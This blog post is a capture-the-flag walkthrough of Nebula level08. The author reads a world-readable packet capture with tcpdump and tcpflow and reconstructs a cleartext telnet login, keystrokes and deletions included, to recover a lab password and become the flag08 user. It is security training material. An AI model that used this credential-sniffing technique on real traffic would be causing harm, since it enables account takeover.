Mike-Boya

Information Security and Programming Blog

Exploit Exercises - Nebula Level08

“World readable files strike again. Check what that user was up to, and use it to log into flag08 account.”

This was the verbiage provided in the About section for level08.

The first step I took was to check the home directory for flag08.

    level08@nebula:/home/flag08$ ls -l
    total 9
    -rw-r--r-- 1 root root 8302 2011-11-20 21:22 capture.pcap

It contained a world readable capture file, let’s see what the “the user was up to.” I ran the capture file through tcpdump to search for any credentials:

    level08@nebula:/home/flag08$ tcpdump -nnAr capture.pcap | grep -i pass
    reading from file capture.pcap, link-type EN10MB (Ethernet)
    **Password: **

It appears that password is mentioned in the output. I could move capture.pcap off the system and run it through wireshark to follow the TCP stream, but decided to stick to the command-line.

I used the tool tcpflow to follow the users activity:

    level08@nebula:/home/flag08$ tcpflow -C -r capture.pcap
    ..%
    ..%
    ..&..... ..#..'..$
    ..&..... ..#..'..$
    .. .....#.....'.........
    .. .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm..
    ........"........!
    ........"..".....b........b.....B.
    ..............................1.......!
    .."....
    .."....
    ..!..........."
    ........"
    .."................
    .....................

    Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)

    ..wwwbugs login:
    l
    .l
    e
    .e
    v
    .v
    e
    .e
    l
    .l
    8
    .8

    .
    .
    Password:
    b
    a
    c
    k
    d
    o
    o
    r
    .
    .
    .
    0
    0
    R
    m
    8
    .
    a
    t
    e

    .

    .
    .
    Login incorrect
    wwwbugs login:

The capture caught the user attempting to login to wwwbugs. The login was incorrect, but may have been mistyped.

The output contains a few deletions, which confirms that the user had forgotten some details like “m8” vs. “mate.” Let’s try to login using “backd00Rmate”:

    level08@nebula:/home/flag08$ su flag08
    Password:
    sh-4.2$ id
    uid=991(flag08) gid=991(flag08) groups=991(flag08)
    sh-4.2$ getflag
    You have successfully executed getflag on a target account

Looks like the password I chose was correct. The tricky part of this challenge was finding the “login incorrect” statement, which steered me away from using other combinations of “backdoor…00Rm8.ate”

Mike